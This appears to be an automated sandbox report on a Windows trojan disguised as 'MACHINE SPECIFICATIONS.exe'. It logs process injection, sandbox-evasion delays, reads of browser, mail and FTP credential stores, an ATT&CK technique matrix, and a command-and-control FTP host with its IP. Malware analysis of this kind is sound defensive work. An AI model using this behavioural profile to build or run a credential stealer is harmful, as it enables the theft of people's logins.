              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 5296Thread sleep count: 299 > 30
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe TID: 2400Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1324Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2148Thread sleep count: 9649 > 30
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2100Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 1116Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9649
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
              Source: CasPol.exe, 0000000A.00000003.399211019.000000000590A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF7BF0 LdrInitializeThunk,
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 438000
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 43E000
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 2CD008
              Source: MACHINE SPECIFICATIONS.exe, C6ean/Ough6.csReference to suspicious API methods: ('Nic8', 'GetProcAddress@kernel32'), ('Ph2ne', 'VirtualProtect@kernel32.dll'), ('Joi3', 'LoadLibraryA@kernel32')
              Source: 10.0.CasPol.exe.400000.0.unpack, A/C1.csReference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
              Source: 10.0.CasPol.exe.400000.0.unpack, A/e2.csReference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeQueries volume information: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeQueries volume information: C:\Users\user\AppData\Roaming\newapp\newapp.exe VolumeInformation
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts211
              Windows Management Instrumentation
              1
              Registry Run Keys / Startup Folder
              211
              Process Injection
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              114
              System Information Discovery
              Remote Services11
              Archive Collected Data
              1
              Exfiltration Over Alternative Protocol
              1
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Native API
              Boot or Logon Initialization Scripts1
              Registry Run Keys / Startup Folder
              1
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              111
              Security Software Discovery
              Remote Desktop Protocol2
              Data from Local System
              Exfiltration Over Bluetooth11
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information
              1
              Credentials in Registry
              1
              Process Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration1
              Non-Standard Port
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)3
              Software Packing
              NTDS131
              Virtualization/Sandbox Evasion
              Distributed Component Object Model11
              Input Capture
              Scheduled Transfer2
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets1
              Application Window Discovery
              SSH1
              Clipboard Data
              Data Transfer Size Limits23
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common131
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Remote System Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items211
              Process Injection
              DCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Hidden Files and Directories
              Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              MACHINE SPECIFICATIONS.exe59%VirustotalBrowse
              MACHINE SPECIFICATIONS.exe73%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
              MACHINE SPECIFICATIONS.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\newapp\newapp.exe0%ReversingLabs
              SourceDetectionScannerLabelLinkDownload
              10.0.CasPol.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
              SourceDetectionScannerLabelLink
              api.ipify.org.herokudns.com0%VirustotalBrowse
              c-0001.c-msedge.net0%VirustotalBrowse
              ftp.electrobist.com1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
              http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              https://api.ipify.orgftp://ftp.electrobist.comuser10%Avira URL Cloudsafe
              https://eyUBHCqVhczCNfHAY6U.org0%Avira URL Cloudsafe
              http://ftp.electrobist.com100%Avira URL Cloudmalware
              http://xgrPBN.com0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              api.ipify.org.herokudns.com
              3.220.57.224
              truefalseunknown
              c-0001.c-msedge.net
              13.107.4.50
              truefalseunknown
              ftp.electrobist.com
              51.195.62.160
              truetrueunknown
              api.ipify.org
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://api.ipify.org/false
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://127.0.0.1:HTTP/1.1CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  https://api.ipify.orgCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://eyUBHCqVhczCNfHAY6U.orgCasPol.exe, 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://xgrPBN.comCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://ftp.electrobist.comCasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772655142.0000000002B6A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://api.ipify.orgftp://ftp.electrobist.comuser1CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      51.195.62.160
                      ftp.electrobist.comFrance
                      16276OVHFRtrue
                      3.220.57.224
                      api.ipify.org.herokudns.comUnited States
                      14618AMAZON-AESUSfalse
                      IP
                      192.168.2.1
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:755960
                      Start date and time:2022-11-29 11:18:06 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:MACHINE SPECIFICATIONS.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:20
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/5@3/3
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
